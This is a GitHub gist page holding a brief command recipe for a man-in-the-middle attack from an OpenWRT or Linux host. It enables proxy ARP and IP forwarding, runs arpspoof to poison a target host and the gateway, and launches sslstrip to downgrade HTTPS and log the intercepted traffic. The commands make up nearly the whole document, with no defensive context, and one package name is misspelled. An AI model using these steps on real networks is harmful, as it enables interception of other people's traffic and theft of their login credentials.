Skip to content

Instantly share code, notes, and snippets.

@suuhm
Created October 8, 2023 13:30
Show Gist options
  • Save suuhm/6f1bd5f1a2982aa2dfff8c4b7a0c674c to your computer and use it in GitHub Desktop.
Save suuhm/6f1bd5f1a2982aa2dfff8c4b7a0c674c to your computer and use it in GitHub Desktop.
OpenWRT - ARP Spoofing and setup SSLStrip
# SET PROXY-ARP
# -------------
echo 1 > /proc/sys/net/ipv4/conf/eth0.1/proxy_arp
# Check with ARPPING
# ------------------
apt install arping
arping 203.0.113.114 -i eth0
# START ARP SPOOFING
# ------------------
apt install dnsiff
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 203.0.113.114 -r 10.0.1.1
# SSLTRIP
# -------
sslstrip -l 8080
tail -f sslstrip.log
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment